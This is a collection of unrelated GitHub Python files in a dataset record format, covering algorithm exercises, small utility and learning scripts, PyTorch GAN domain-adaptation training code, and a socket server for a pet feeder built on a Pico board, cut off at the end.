fig, ax = plt.subplots()\r\n ax.scatter(data['X1'], data['X2'], s=50, c=data['SVM100 Confidence'], cmap='RdBu')\r\n ax.set_title('SVM (C=100) Decision Confidence')\r\n plt.show()\r\n\r\n # 查看数据\r\n print(data.head())\r\n","repo_name":"Vodkazy/ML-Model","sub_path":"Ng_Mechine_Learning/SVM/Linear_SVM/linear_svm.py","file_name":"linear_svm.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25927705736","text":"import urllib.request\nimport json\n\nDOGSURL = \"http://downloads.ascentops.com/southhills/dogs.json\"\n# f = urllib.request.urlopen(DOGSURL)\n# data = json.load(f)\n# print(data)\n# f.close()\n\nPDFURL = \"https://www.southhills.edu/media/PDF/catalog/catalog_2017-18.pdf\"\nwith urllib.request.urlopen(PDFURL) as f:\n data = f.read()\n with open (\"download.pdf\", \"wb\") as dl:\n dl.write(data)\n","repo_name":"hessercan/SHSBT-Hesser-Python-Projects","sub_path":"week9/sample-url.py","file_name":"sample-url.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40213978317","text":"# A Python3 program for Prim's Minimum Spanning Tree (MST) algorithm.\n# The program is for adjacency matrix representation of the graph\n\nimport sys \n\n\nclass Graph():\n\n def __init__(self, vertices):\n self.V = vertices\n self.graph = [[0 for column in range(vertices)]\n for row in range(vertices)]\n\n def printMST(self, parent):\n print(\"Edge \\tWeight\")\n for i in range(1, self.V):\n print(parent[i], \"-\", i, \"\\t\", self.graph[i][parent[i]])\n\n def minKey(self, key):\n\n min = sys.maxsize\n\n for v in range(self.V):\n if key[v] < min:\n min = key[v]\n min_index = v\n\n return min_index\n\n def primMST(self):\n\n key = [sys.maxsize] * 
self.V\n parent = [None] * self.V \n key[0] = 0\n mstSet = [False] * self.V\n\n parent[0] = -1 \n\n for _ in range(self.V):\n\n u = self.minKey(key)\n\n mstSet[u] = True\n\n for v in range(self.V):\n\n if self.graph[u][v] > 0 and mstSet[v] is False and key[v] > self.graph[u][v]:\n key[v] = self.graph[u][v]\n parent[v] = u\n key[u] = sys.maxsize\n self.printMST(parent)\n\n\n# Driver's code\nif __name__ == '__main__':\n g = Graph(5)\n g.graph = [[0, 2, 0, 6, 0],\n [2, 0, 3, 8, 5],\n [0, 3, 0, 0, 7],\n [6, 8, 0, 0, 9],\n [0, 5, 7, 9, 0]]\n\n g.primMST()\n\n","repo_name":"vKrypto/practice-dsa","sub_path":"data_structures/graph/prims.py","file_name":"prims.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"33157344510","text":"import random\nimport unittest\ntry:\n from unittest.mock import patch\nexcept ImportError:\n # < python 3.3\n from mock import patch\n\n\nclass Die():\n\n def roll(self):\n return random.randint(15, 99)\n\n\n@patch('random.randint', return_value=3)\nclass TestDice(unittest.TestCase):\n\n def test_standard_size(self, mocked_randint):\n die = Die()\n result = die.roll()\n\n mocked_randint.assert_called_with(15, 99)\n self.assertEqual(result, 3)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"python-br/pythontest-estudos","sub_path":"tests/test_random2.py","file_name":"test_random2.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"36774999079","text":"import json\r\n\r\nfilename = 'fav_num.json'\r\n\r\ndef print_num():\r\n\t\"\"\"Prints and retrieves fav number\"\"\"\r\n\ttry:\r\n\t\twith open(filename) as f_ob:\r\n\t\t\tnum = json.load(f_ob)\r\n\t\t\tprint(\"Your favorite number is \" + str(num))\r\n\texcept FileNotFoundError:\r\n\t\tnew_fav_num()\r\n\t\t\r\ndef new_fav_num():\r\n\t\"\"\"Creates and stores new favorite number\"\"\"\r\n\tnew_num = input(\"What is your favorite number? \")\r\n\twith open(filename, 'w') as f_ob:\r\n\t\tjson.dump(new_num, f_ob)\r\n\t\t\r\n\r\nprint_num()\r\n\r\n\r\n","repo_name":"AlexLinGit/SICP-and-Other-Code","sub_path":"Python Crash Course Exercises/chapter 10 - files and exceptions/favorite_number.py","file_name":"favorite_number.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19167111726","text":"# st2common\n\n__all__ = [\n \"ALLOWED_SCOPES\",\n \"SYSTEM_SCOPE\",\n \"FULL_SYSTEM_SCOPE\",\n \"SYSTEM_SCOPES\",\n \"USER_SCOPE\",\n \"FULL_USER_SCOPE\",\n \"USER_SCOPES\",\n \"USER_SEPARATOR\",\n \"DATASTORE_SCOPE_SEPARATOR\",\n \"DATASTORE_KEY_SEPARATOR\",\n]\n\nALL_SCOPE = \"all\"\n\n# Parent namespace for all items in key-value store\nDATASTORE_PARENT_SCOPE = \"u8kv\"\nDATASTORE_SCOPE_SEPARATOR = (\n \".\" # To separate scope from datastore namespace. E.g. 
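# Hedged aside: the adjacency-matrix Prim above runs in O(V^2). For sparse
# graphs the usual alternative is a binary-heap variant; this is a minimal
# sketch (not from the original repo) run on the same 5-vertex matrix so the
# two versions can be cross-checked against each other.
import heapq

def prim_heap(matrix):
    n = len(matrix)
    visited = [False] * n
    heap = [(0, 0, -1)]  # (edge weight, vertex, parent)
    total, edges = 0, []
    while heap:
        w, u, p = heapq.heappop(heap)
        if visited[u]:
            continue
        visited[u] = True
        total += w
        if p >= 0:
            edges.append((p, u, w))
        for v, wv in enumerate(matrix[u]):
            if wv > 0 and not visited[v]:
                heapq.heappush(heap, (wv, v, u))
    return total, edges

matrix = [[0, 2, 0, 6, 0], [2, 0, 3, 8, 5], [0, 3, 0, 0, 7],
          [6, 8, 0, 0, 9], [0, 5, 7, 9, 0]]
print(prim_heap(matrix))  # total weight 16, same MST as the matrix version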
u8kv.system\n)\n\n# Namespace to contain all system/global scoped variables in key-value store.\nSYSTEM_SCOPE = \"system\"\nFULL_SYSTEM_SCOPE = \"%s%s%s\" % (\n DATASTORE_PARENT_SCOPE,\n DATASTORE_SCOPE_SEPARATOR,\n SYSTEM_SCOPE,\n)\n\nSYSTEM_SCOPES = [SYSTEM_SCOPE]\n\n# Namespace to contain all user scoped variables in key-value store.\nUSER_SCOPE = \"user\"\nFULL_USER_SCOPE = \"%s%s%s\" % (\n DATASTORE_PARENT_SCOPE,\n DATASTORE_SCOPE_SEPARATOR,\n USER_SCOPE,\n)\n\nUSER_SCOPES = [USER_SCOPE]\n\nUSER_SEPARATOR = \":\"\n\n# Separator for keys in the datastore\nDATASTORE_KEY_SEPARATOR = \":\"\n\nALLOWED_SCOPES = [SYSTEM_SCOPE, USER_SCOPE, FULL_SYSTEM_SCOPE, FULL_USER_SCOPE]\n","repo_name":"bossjones/ultron8","sub_path":"ultron8/constants/keyvalue.py","file_name":"keyvalue.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29476741246","text":"# https://www.spoj.com/problems/CHICAGO/\n\nclass Edge:\n def __init__(self, source, target, weight):\n self.source = source\n self.target = target\n self.weight = weight\n\ndef BellFord(s,n,m):\n dist[s] = 1\n for i in range(n-1):\n for j in range(len(graph)):\n u = graph[j].source\n v = graph[j].target\n w = graph[j].weight\n if (dist[u]*w)/100 > dist[v]:\n dist[v] = (dist[u]*w)/100\n path[v] = u\n\nwhile True:\n n = list(map(int, input().split()))\n\n if len(n)==1:\n break\n\n dist = [0] * n[0]\n path = [-1] * n[0]\n graph = []\n\n for i in range(n[1]):\n u,v,w = map(int, input().split())\n graph.append(Edge(u-1,v-1,w))\n graph.append(Edge(v-1,u-1,w))\n\n graph.sort(key=lambda x: x.source)\n BellFord(0,n[0],n[1])\n print('%.6f' % (dist[n[0]-1]*100),' percent',sep='')","repo_name":"arnabs542/Competitive-Programming","sub_path":"BigO/Blue/Lecture10_Bellman-Ford/106MilesToChicago.py","file_name":"106MilesToChicago.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29240317150","text":"class Card:\n def __init__(self, card_number, expiration_date, cvv_code, issue_date, owner_id=None, status_card=\"new\"):\n self.card_number = card_number\n self.expiration_date = expiration_date\n self.cvv_code = cvv_code\n self.issue_date = issue_date\n self.owner_id = owner_id\n self.status_card = status_card\n\n def activate(self):\n if self.status_card == \"new\":\n self.status_card = \"activated\"\n return \"Card activated.\"\n else:\n return \"Card already activated.\"\n\n def block(self):\n if self.status_card == \"activated\":\n self.status_card = \"blocked\"\n return \"Card blocked.\"\n else:\n return \"Card cannot be blocked.\"\n","repo_name":"RikiTikiTavvi/hillel_pro","sub_path":"lesson5/card.py","file_name":"card.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24794637383","text":"a, b, c = map(int, input().split())\nh = {}\nans = \"NO\"\nn = a\nwhile not n % b in h:\n if (n % b) == c:\n ans = \"YES\"\n break\n h[n % b] = 1\n n += a\nprint(ans)\n","repo_name":"whisper0077/programming-contests","sub_path":"atcoder/ABC/060/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9211505196","text":"import json, copy, csv, sys\r\nfrom product import Product\r\nfrom datetime import datetime\r\nimport time\r\n\r\n\r\nclass Penztar:\r\n 
def __init__(self, invnetory_file, products_file, nav_export_path) -> None:\r\n self.products = []\r\n self.invnetory_file = invnetory_file\r\n self.products_file = products_file\r\n self.nav_export_path = nav_export_path\r\n self.cart = []\r\n self.out_of_stock_products = 0\r\n self.total = 0\r\n\r\n def read_inventory(self):\r\n with open(self.invnetory_file, \"r\", encoding=\"utf-8\") as file:\r\n content = csv.DictReader(file)\r\n for row in content:\r\n name = row[\"name\"]\r\n count = row[\"count\"]\r\n product = Product(name=name, count=count)\r\n self.products.append(product)\r\n\r\n def read_products(self):\r\n with open(self.products_file, \"r\", encoding=\"utf-8\") as file:\r\n json_content = json.load(file)\r\n for categotry in json_content:\r\n # [{'name': 'öngyújtó', 'price': 309}, {'name': 'zsepi', 'price': 499}]\r\n data_line = json_content[categotry]\r\n for sub_data in data_line:\r\n item_name = sub_data[\"name\"]\r\n item_price = sub_data[\"price\"]\r\n for product in self.products:\r\n product_name = product.get_name\r\n if product_name == item_name:\r\n product.set_type(categotry)\r\n product.set_price(item_price)\r\n\r\n # print(list(map(lambda x: print(x), self.products)))\r\n\r\n def show_available_items(self):\r\n print(\"\\n=========================================\"\r\n \"======\\nAvailable items:\\n------------------\"\r\n \"-----------------------------\")\r\n counter = 1\r\n temp_data = {}\r\n self.out_of_stock_products = 0\r\n for product in self.products:\r\n name = product.get_name\r\n price = product.get_price\r\n count = product.get_count\r\n prod_id = product.get_id\r\n\r\n if int(count) > 0:\r\n print(f\"{counter:>4}.) {name:>15}\".ljust(30),f\"{count} db, {price} Ft\".ljust(15))\r\n temp_data[counter] = name\r\n counter += 1\r\n else:\r\n self.out_of_stock_products += 1\r\n print(f\"{name:>22}\", f\"\\t\\tOUT OF STOCK\".ljust(30))\r\n # counter += 1\r\n my_space = \" \"\r\n print(f\"{(len(self.products) + 1) - self.out_of_stock_products:>4}.){my_space:<12}Quit\")\r\n\r\n self._main_loop(temp_data)\r\n\r\n def _main_loop(self, temp_data):\r\n while True:\r\n choice = input(\"---------------------------------------\"\r\n \"--------\\nChoose a product...\")\r\n if not choice.isdigit():\r\n print(\"Type number only...\")\r\n continue\r\n choice = int(choice)\r\n if choice < 1 or choice > (len(self.products) + 1) - self.out_of_stock_products:\r\n print(\"Type a valid number...\")\r\n continue\r\n if choice == (len(self.products) + 1) - self.out_of_stock_products:\r\n print(\"Quitting...\")\r\n\r\n # PRINT PRODUCTS RECIPE\r\n print(\"\\n=================================\\nRECIPE\"\r\n \"\\n----------------------------------------------\")\r\n for product in self.cart:\r\n name = product.get_name\r\n price = product.get_price\r\n purchased = product.get_purchased\r\n subtotal = price * int(purchased)\r\n self.total += subtotal\r\n print(f\"{name}, {purchased}x, {price} Ft - subtotal: {subtotal}\")\r\n print(f\"TOTAL: {self.total} Ft\")\r\n print(\"----------------------------------------------\")\r\n # print(list(map(lambda x: print(f\"{x.get_name}, {x.get_count}x - {x.get_price} Ft, subtotal: \"), self.cart)))\r\n\r\n # SAVE NAV EXPORT\r\n self._save_nav_json()\r\n\r\n # SAVE NEW INVENTORY\r\n self._save_new_inventory()\r\n quit()\r\n\r\n chosen_item = temp_data[choice]\r\n print(f\"\\n======================\\nYou choosed: {chosen_item}\"\r\n \"\\n======================\")\r\n \r\n while True:\r\n amount_to_buy = 
input(\"\\n======================================\\n\"\r\n \"How much would you like to buy? \")\r\n if not amount_to_buy.isdigit():\r\n print(\"Type number only...\")\r\n continue\r\n amount_to_buy = int(amount_to_buy)\r\n if amount_to_buy <= 0:\r\n print(\"Type a valid number...\")\r\n continue\r\n\r\n in_cart = False\r\n for product in self.products:\r\n product_name = product.get_name\r\n product_count = product.get_count\r\n if product_name == chosen_item:\r\n if amount_to_buy > int(product_count):\r\n print(\"\\nThere is not enough to buy...\\n\")\r\n break\r\n new_product = copy.deepcopy(product)\r\n new_product.set_purchased(amount_to_buy)\r\n for cart_product in self.cart:\r\n if cart_product.get_name == product_name:\r\n in_cart = True\r\n current_purchased_amount = cart_product.get_purchased\r\n new_purchased_amount = current_purchased_amount + amount_to_buy\r\n cart_product.set_purchased(new_purchased_amount)\r\n current_count = product.get_count\r\n new_count = current_count - amount_to_buy\r\n product.set_count(new_count)\r\n print(f\"You bought {amount_to_buy}x from {chosen_item}\"\r\n \"\\n======================================\")\r\n if not in_cart:\r\n self.cart.append(new_product)\r\n current_count = product.get_count\r\n new_count = int(current_count) - amount_to_buy\r\n product.set_count(new_count)\r\n print(f\"You bought {amount_to_buy}x from {chosen_item}\"\r\n \"\\n======================================\")\r\n \r\n # print(list(map(lambda x: print(f\"{x.get_name}, {x.get_count}x\"), self.cart)))\r\n input(\"Press a key to continue...\")\r\n self.show_available_items()\r\n break\r\n\r\n def _save_nav_json(self):\r\n to_save_json = {\r\n \"register\": \"AP00700194\",\r\n \"sum\": self.total,\r\n }\r\n for product in self.cart:\r\n product_type = product.get_type\r\n product_name = product.get_name\r\n product_purchased = product.get_purchased\r\n if product_type in to_save_json:\r\n to_save_json[product_type].append({\"name\": product_name,\r\n \"amount\": product_purchased})\r\n else:\r\n to_save_json[product_type] = [{\"name\": product_name,\r\n \"amount\": product_purchased}]\r\n \r\n\r\n to_save_json[\"petrol\"] = []\r\n\r\n print(\"Exporting Nav doc...\")\r\n\r\n export_date = datetime.now().strftime(\"%Y-%M-%d\")\r\n export_hour = datetime.now().strftime(\"%H-%m-%S\")\r\n export_path = f\"{self.nav_export_path}nav_export_{export_date}-{export_hour}.json\"\r\n with open(export_path, \"w\", encoding=\"utf-8\") as file:\r\n json_save = json.dumps(to_save_json, ensure_ascii=False)\r\n file.write(json_save)\r\n print(\"Nav doc exported...\")\r\n\r\n def _save_new_inventory(self):\r\n headers = [\"name\", \"count\"]\r\n new_inv_items = []\r\n for product in self.products:\r\n product_name = product.get_name\r\n product_count = product.get_count\r\n new_inv_dict = {\r\n \"name\": product_name,\r\n \"count\": product_count\r\n }\r\n new_inv_items.append(new_inv_dict)\r\n with open(\"new_stock.csv\", \"w\", encoding=\"utf-8\", newline=\"\") as file:\r\n writer = csv.DictWriter(file, headers)\r\n writer.writeheader()\r\n writer.writerows(new_inv_items)\r\n\r\nclass Stock:\r\n def __init__(self, stock_file, invnetory_file) -> None:\r\n self.stock_file = stock_file\r\n self.invnetory_file = invnetory_file\r\n self.inventory = self.read_file(self.invnetory_file)\r\n self.new_inventory = self.read_file(self.stock_file)\r\n\r\n def start_stock(self):\r\n self.compare()\r\n\r\n def compare(self):\r\n print(\"\\n=======================\\nSTOCK\"\r\n 
\"\\n-----------------------\")\r\n for i in range(len(self.inventory)):\r\n inv_item = self.inventory[i]\r\n new_inv_item = self.new_inventory[i]\r\n\r\n inv_item_name = inv_item[\"name\"]\r\n new_inv_item_name = new_inv_item[\"name\"]\r\n inv_item_count = int(inv_item[\"count\"])\r\n new_inv_item_count = int(new_inv_item[\"count\"])\r\n\r\n if inv_item_name == new_inv_item_name:\r\n diff = abs(inv_item_count - new_inv_item_count)\r\n if new_inv_item_count < 0:\r\n print(f\"{inv_item_name:<20} -{diff}!\")\r\n\r\n if new_inv_item_count > inv_item_count:\r\n print(f\"{inv_item_name:<20} +{diff}!\")\r\n if new_inv_item_count < inv_item_count and new_inv_item_count >= 0:\r\n print(f\"{inv_item_name:<20} {diff}\")\r\n print(\"=======================\")\r\n\r\n def read_file(self, file_to_read: str) -> list:\r\n data = []\r\n with open(file_to_read, \"r\", encoding=\"utf-8\") as file:\r\n content = csv.DictReader(file)\r\n for row in content:\r\n storage = {\r\n \"name\": \"\",\r\n \"count\": 0\r\n }\r\n name = row[\"name\"]\r\n count = row[\"count\"]\r\n storage[\"name\"] = name\r\n storage[\"count\"] = count\r\n data.append(storage)\r\n return data\r\n\r\nif __name__ == '__main__':\r\n invnetory_file = \"inventory.csv\"\r\n if len(sys.argv) == 3 and sys.argv[1] == \"-l\":\r\n stock_file = sys.argv[2]\r\n # stock_file = \"new_stock.csv\"\r\n stock = Stock(stock_file, invnetory_file)\r\n stock.start_stock()\r\n\r\n else:\r\n products_file = \"products.json\"\r\n nav_export_path = \"nav_exports/\"\r\n penztar = Penztar(invnetory_file, products_file, nav_export_path)\r\n penztar.read_inventory()\r\n penztar.read_products()\r\n penztar.show_available_items()\r\n","repo_name":"8Klaro8/stock_second_solution","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71562830520","text":"import torch\nimport torch.nn as nn\nimport sys\nsys.path.insert(0, '../common')\nfrom utils import *\n\ndtype = torch.FloatTensor\nif torch.cuda.is_available():\n dtype = torch.cuda.FloatTensor\n\ndef test(g_net, c_net, train_data, batch_size = 64, output_file='./test_results.txt'):\n prediction = torch.tensor([])\n for data in train_data:\n s = data\n mini_batch_size = s.shape[0]\n s = var(s).type(dtype)\n output = g_net(s)\n output = c_net(output)\n prediction = torch.cat((prediction, output))\n print(prediction.shape)\n return prediction\n\n\ndef feature_net_train(f_net, c_net, train_data, lr = 0.001, batch_size = 64, num_epochs = 5, output_path = './', validate = True):\n f_opt = torch.optim.Adam(f_net.parameters(), lr = lr)\n c_opt = torch.optim.Adam(c_net.parameters(), lr = lr)\n loss_fn = nn.CrossEntropyLoss()\n\n last_index = int(len(train_data.dataset) / batch_size)\n for epoch in range(0, num_epochs):\n total_loss = 0\n i = 0\n for data in train_data:\n s = data[0]\n l = data[1]\n i += 1\n if validate == True and i == last_index:\n break\n batchSize = s.shape[0]\n s = var(s).type(dtype)\n l = var(torch.LongTensor(l)) #.type(torch.LongTensor)\n output = f_net(s)\n output = c_net(output)\n loss = loss_fn(output, l)\n f_net.zero_grad()\n c_net.zero_grad()\n loss.backward()\n f_opt.step()\n c_opt.step()\n total_loss += loss\n\n print('Epoch:', epoch, 'Total Loss:', total_loss.cpu().item(), 'Last batch Loss:', loss.cpu().item())\n if epoch % 10 == 0:\n # torch.save(f_net.state_dict(), output_path+'saved_models/f_net_'+str(epoch/100)+'.pkl')\n # torch.save(c_net.state_dict(), 
output_path+'saved_models/l_net_'+str(epoch/100)+'.pkl')\n torch.save(f_net.state_dict(), output_path+'saved_models/f_net.pkl')\n torch.save(c_net.state_dict(), output_path+'saved_models/l_net.pkl')\n\n ## Validation accuracy on last index\n if validate:\n mini_batch_size = s.shape[0]\n s = var(s).type(dtype)\n l = var(torch.LongTensor(l)) #.type(dtype)\n output = f_net(s)\n output = c_net(output)\n _, predicted = torch.max(output.data, 1)\n # predicted = torch.LongTensor(predicted)\n accuracy = ((predicted == l).sum()) * 100 / mini_batch_size\n print('Epoch:', epoch, 'Accuracy:', accuracy.cpu().item())\n\ndef gan_train_domain_adapt(gen_net, dis_net, classify_net, real_data_loader, syn_data_loader, num_epochs = 10, batch_size = 64, lr = 0.001, output_path = './'):\n g_opt = torch.optim.Adam(gen_net.parameters(), lr = lr)\n d_opt = torch.optim.Adam(dis_net.parameters(), lr = lr)\n last_index = int(len(real_data_loader.dataset) / batch_size)\n for epoch in range(0, num_epochs):\n i = 0\n g_loss_total = 0\n d_loss_total = 0\n syn_img_iter = iter(syn_data_loader)\n syn_img_cnt = 0\n syn_img_len = len(syn_data_loader)\n for r_data in real_data_loader:\n # print(r_data[0].shape)\n real_img = r_data[0]\n real_label = r_data[1]\n i += 1\n if syn_img_cnt == syn_img_len:\n syn_img_iter = iter(syn_data_loader)\n syn_img_cnt = 0\n syn_img_cnt += 1\n syn_img = next(syn_img_iter)[0]\n mini_batch_size = syn_img.shape[0]\n syn_img = var(syn_img).type(dtype)\n real_img = var(real_img).type(dtype)\n\n if i == last_index:\n mini_batch_size = real_img.shape[0]\n real_image = var(real_img).type(dtype)\n real_label = var(torch.LongTensor(real_label)) #.type(dtype)\n output = gen_net(real_image)\n output = classify_net(output)\n _, predicted = torch.max(output.data, 1)\n\n accuracy = ((predicted == real_label).sum()) * 100 / mini_batch_size\n print('Epoch:', epoch, 'Accuracy:', accuracy.cpu().item())\n break\n\n # Discriminator training\n d_truth = dis_net(gen_net(syn_img))\n d_fake = dis_net(gen_net(real_img))\n d_loss = torch.mean(d_truth) - torch.mean(d_fake)\n\n dis_net.zero_grad()\n d_loss.sum().backward()\n d_opt.step()\n\n # Generator training\n g_fake = dis_net(gen_net(real_img))\n g_loss = -torch.mean(g_fake)\n gen_net.zero_grad()\n g_loss.backward()\n g_opt.step()\n d_loss_total += d_loss\n g_loss_total += g_loss\n\n #print('Epoch [{}/{}], Discriminator {}|{}, Generator {}|{}'.format(epoch+1, num_epochs, d_loss.item(), d_loss_total.item(), g_loss.item(), g_loss_total.item()))\n print('Epoch [{}/{}], Discriminator {}|{}, Generator {}|{}'.format(epoch+1, num_epochs, d_loss.cpu().item(), d_loss_total.cpu().item(), g_loss.cpu().item(), g_loss_total.cpu().item()))\n\n if epoch % 1== 0:\n torch.save(gen_net.state_dict(), output_path+'saved_models/g_net.pkl')\n torch.save(dis_net.state_dict(), output_path+'saved_models/d_net.pkl')\n","repo_name":"bhushan23/deep-domain-adaptation","sub_path":"1_latent_space_adaptation/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"44588916460","text":"class Solution:\n def minSubArrayLen(self, target: int, nums: List[int]) -> int:\n current_sum = 0\n window_size = float(inf)\n left = 0\n right = 0\n while right < len(nums):\n current_sum += nums[right]\n while(current_sum >= target):\n window_size = min(window_size,right-left+1)\n current_sum -= nums[left]\n left += 1\n right += 1\n return window_size if window_size != float(inf) else 
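# Hedged sketch of the alternating critic/generator updates performed in
# gan_train_domain_adapt above, reduced to toy linear nets on random vectors.
# It keeps the same sign convention as the original code (d_loss =
# mean(D(G(syn))) - mean(D(G(real))), g_loss = -mean(D(G(real)))); whether that
# is the intended WGAN direction is an assumption carried over from the source.
import torch
import torch.nn as nn

gen, critic = nn.Linear(8, 8), nn.Linear(8, 1)
g_opt = torch.optim.Adam(gen.parameters(), lr=1e-3)
d_opt = torch.optim.Adam(critic.parameters(), lr=1e-3)

for step in range(3):
    syn, real = torch.randn(16, 8), torch.randn(16, 8)
    # critic step: only the critic's optimizer moves
    d_loss = critic(gen(syn)).mean() - critic(gen(real)).mean()
    d_opt.zero_grad()
    d_loss.backward()
    d_opt.step()
    # generator step: push the critic's score on generated features up
    g_loss = -critic(gen(real)).mean()
    g_opt.zero_grad()
    g_loss.backward()
    g_opt.step()
    print(step, d_loss.item(), g_loss.item())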
0\n","repo_name":"Protype8/LeetCode","sub_path":"Sliding Window/Minimum Size Subarray Sum - LeetCode.py","file_name":"Minimum Size Subarray Sum - LeetCode.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21853369871","text":"import socket\r\nimport threading\r\nimport time\r\n\r\n# server info\r\nHEADER = 64\r\nPORT_PICO = 443\r\nPORT_WEB = 777\r\nSERVER = socket.gethostbyname(socket.gethostname())\r\nADDR_PICO = (SERVER, PORT_PICO)\r\nADDR_WEB = (SERVER, PORT_WEB)\r\nFORMAT = \"utf-8\"\r\nINSTRUCTION_INTERVAL = 5\r\nMAX_HISTORY_RECORD = 5\r\n\r\n# saved data\r\ncurrInst: str = \"None\"\r\ncurrFoodWeight: float = 0.0\r\nmaxFoodWeight: float = 100.0\r\nfeedSchdule: list = list() # (str: time, bool: done) time in format: \"hour minute\"\r\nfeedHistory: list = list() # (str: time, str: amount) time in format: \"year mon day hour minute\"\r\ncleanHistory: list = list() # (str: time) time in format: \"year mon day hour minute\"\r\nplay: bool = False\r\nplay_status : str = \"off\"\r\nmanualFeed = False\r\nmanualClean = False\r\n\r\nserver_pico = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nserver_pico.bind(ADDR_PICO)\r\n\r\nserver_web = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nserver_web.bind(ADDR_WEB)\r\n\r\npreviousTime:list = list()\r\n\r\ndef refreshSchedule():\r\n global feedSchdule\r\n for i in range(len(feedSchdule)):\r\n feedSchdule[i] = (feedSchdule[i][0],False)\r\n# struct_time to string for time comparison:hh mm ss\r\ndef time_transfer_day(localTime: time.struct_time):\r\n hour = localTime.tm_hour\r\n minute = localTime.tm_min\r\n second = localTime.tm_sec\r\n result = str(hour) + \" \" + str(minute) + \" \" + str(second)\r\n return result\r\n# struct_time to string for data storage: yyyy/mm/dd_hh:mm\r\ndef time_transfer_date(localTime: time.struct_time):\r\n year = localTime.tm_year\r\n month = localTime.tm_mon\r\n day = localTime.tm_mday\r\n hour = localTime.tm_hour\r\n minute = localTime.tm_min\r\n result = str(year) + \"/\" + str(month) + \"/\" + str(day) + \"_\" + str(hour) + \":\" + str(minute)\r\n return result\r\n\r\n# check if the difference between two time_string is within certain range\r\ndef time_in_range_day(time1: str, time2: str):\r\n time1_list = time1.split()\r\n time2_list = time2.split()\r\n \r\n time_1 = int(time1_list[0])*3600 + int(time1_list[1])*60 + int(time1_list[2])\r\n time_2 = int(time1_list[0])*3600 + int(time2_list[1])*60 + int(time2_list[2])\r\n return abs(time_1 - time_2) <= INSTRUCTION_INTERVAL * 2\r\n\r\n# sending message to certain connection with appropriate protocal header\r\ndef reply(conn, msg):\r\n message = msg.encode(FORMAT)\r\n # fixed length header before actual message\r\n msg_length = len(message)\r\n send_length = str(msg_length).encode(FORMAT)\r\n send_length += b' ' * (HEADER - len(send_length))\r\n \r\n conn.send(send_length)\r\n conn.send(message)\r\n\r\n# preparation before sending instruction to pico\r\ndef update_inst():\r\n now = time.localtime()\r\n now_str: str = time_transfer_day(now)\r\n # for schedule refresh\r\n instruct = \"None\"\r\n global manualFeed\r\n global manualClean\r\n global feedHistory\r\n global cleanHistory\r\n # manual command has higher prority than timed event\r\n manual: bool = False\r\n if manualFeed:\r\n # for history record\r\n amount = maxFoodWeight - currFoodWeight\r\n if amount < 0:\r\n amount = 0\r\n # record the action in a list\r\n 
feedHistory.append((time_transfer_date(now), str(amount)))\r\n        # only keep the last n records; remove the earliest record if it exceeds the limit\r\n        if len(feedHistory) > MAX_HISTORY_RECORD:\r\n            feedHistory = feedHistory[-MAX_HISTORY_RECORD:]\r\n        # actual message\r\n        instruct = \"feed\" + \" \" + str(maxFoodWeight)\r\n        manual = True\r\n        manualFeed = False\r\n    elif manualClean:\r\n        # record the action in a list\r\n        cleanHistory.append(time_transfer_date(now))\r\n        # only keep the last n records; remove the earliest record if it exceeds the limit\r\n        if len(cleanHistory) > MAX_HISTORY_RECORD:\r\n            cleanHistory = cleanHistory[-MAX_HISTORY_RECORD:]\r\n        # actual message\r\n        instruct = \"clean\"\r\n        manual = True\r\n        manualClean = False\r\n\r\n    if not manual: # scheduled feed\r\n        global feedSchdule\r\n        for i in range(len(feedSchdule)):\r\n            # check if time has reached the set feeding time\r\n            if time_in_range_day(feedSchdule[i][0], now_str) and not feedSchdule[i][1]:\r\n                # for history record\r\n                amount = maxFoodWeight - currFoodWeight\r\n                if amount < 0:\r\n                    amount = 0\r\n                # record the action in a list\r\n                feedSchdule[i] = (feedSchdule[i][0], True)\r\n                feedHistory.append((time_transfer_date(now), str(amount)))\r\n                # only keep the last n records; remove the earliest record if it exceeds the limit\r\n                if len(feedHistory) > MAX_HISTORY_RECORD:\r\n                    feedHistory = feedHistory[-MAX_HISTORY_RECORD:]\r\n                # construct actual message\r\n                instruct = \"feed\" + \" \" + str(maxFoodWeight)\r\n                break\r\n\r\n    global play\r\n    if play:\r\n        instruct = \"play\" + \" \" + play_status\r\n        play = False\r\n\r\n    global currInst\r\n    currInst = instruct\r\n# send instruction to pico\r\ndef sendInst(conn):\r\n    update_inst()\r\n    print(f\"To pico instruction: {currInst}\")\r\n    reply(conn, currInst)\r\n# change local variables for instruction sending\r\ndef update_play(status):\r\n    global play\r\n    play = True\r\n    global play_status\r\n    play_status = status\r\n# change local variables for instruction sending\r\ndef update_max_food(amount):\r\n    global maxFoodWeight\r\n    if float(amount) > 0:\r\n        maxFoodWeight = float(amount)\r\n# 